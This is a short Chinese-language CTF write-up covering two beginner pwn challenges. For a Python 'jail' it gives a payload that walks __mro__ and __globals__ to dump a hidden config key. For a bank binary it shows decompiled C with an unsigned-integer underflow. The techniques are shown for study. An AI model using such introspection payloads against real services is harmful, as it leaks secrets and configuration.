pwn
嘛,因为学校那边的事情,好久没有打ctf了,找个beginner难度的ctf热身一下
Knight’s Secret
pyjail?? 题目自定义了一个person类,可以访问person类的属性,方法。题目目标只需要获取程序环境中的key,通过内置方法 mro返回的继承链数组来获取object对象,拿到object对象后就可以通过globals内置方法去检索程序中有的属性 方法拿到key
exp
1
2
3
| Enter your secret: {person_obj.__class__.__mro__[0].__init__.__globals__}
Output: {'__name__': '__main__', '__doc__': None, '__package__': None, '__loader__': <_frozen_importlib_external.SourceFileLoader object at 0x76a7e6a7b920>, '__spec__': None, '__annotations__': {}, '__builtins__': <module 'builtins' (built-in)>, '__file__': '/challenge/challenge.py', '__cached__': None, 'CONFIG': {'KEY': '_KNIGHTSECRET2025_'}, 'Person': <class '__main__.Person'>, 'fun': <function fun at 0x76a7e6a62340>, 'main': <function main at 0x76a7e6840d60>}
|
Knight Bank
整数溢出,让uint溢出就好了
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
| int __cdecl main(int argc, const char **argv, const char **envp)
{
unsigned int v4;
unsigned int v5;
v5 = 1000;
puts("Welcome to the Knight Bank!");
fflush(_bss_start);
printf("Your current balance is: %u\n", 1000LL);
fflush(_bss_start);
printf("Enter the amount you want to withdraw: ");
fflush(_bss_start);
if ( (unsigned int)__isoc99_scanf("%u", &v4) == 1 )
{
if ( v4 <= 0xF4240 )
{
v5 -= v4;
printf("You withdrew %u. Your new balance is %u.\n", v4, v5);
fflush(_bss_start);
if ( v5 <= 0xF4240 )
{
puts("Better luck next time!");
fflush(_bss_start);
}
else
{
win_prize();
}
return 0;
}
else
{
puts("Error: You cannot withdraw more than 1,000,000 at a time.");
fflush(_bss_start);
return 1;
}
}
else
{
puts("Invalid input. Exiting.");
fflush(_bss_start);
return 1;
}
}
int win_prize()
{
puts("Congratulations! You win the prize!");
fflush(_bss_start);
return system("cat flag.txt");
}
|
exp
